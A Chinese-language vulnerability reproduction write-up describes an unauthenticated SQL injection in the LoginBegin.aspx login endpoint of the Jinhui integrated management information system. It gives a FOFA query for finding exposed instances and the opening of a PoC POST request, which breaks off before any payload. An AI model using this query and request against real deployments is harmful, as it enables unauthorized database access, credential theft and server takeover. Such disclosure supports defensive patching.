金慧-综合管理信息系统 LoginBegin.aspx SQL注入漏洞复现

0x01 产品简介

金慧-综合管理信息系统（以下简称“金慧综合管理系统”）是上海金慧软件有限公司基于多年行业系统研发和实施经验，为各类企业量身定制的一套综合性管理解决方案。该系统旨在通过信息化手段，提升企业的管理效率，优化资源配置，实现办公自动化和无纸化办公。系统集成了企业日常办公、项目管理、财务管理、人力资源管理等多个方面的功能，通过统一的平台实现数据的共享和流程的协同。该系统以用户需求为导向，结合行业最佳实践，为企业提供了一套高效、灵活、易用的管理工具。

0x02 漏洞概述

由于金慧-综合管理信息系统 LoginBegin.aspx（登录接口处）没有对外部输入的SQL语句进行严格的校验和过滤，直接带入数据库执行，导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

0x03 复现环境

FOFA：

body="/Portal/LoginBegin.aspx"

0x04 漏洞复现 

PoC

POST /Portal/LoginBegin.aspx?ReturnUrl=%2f HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: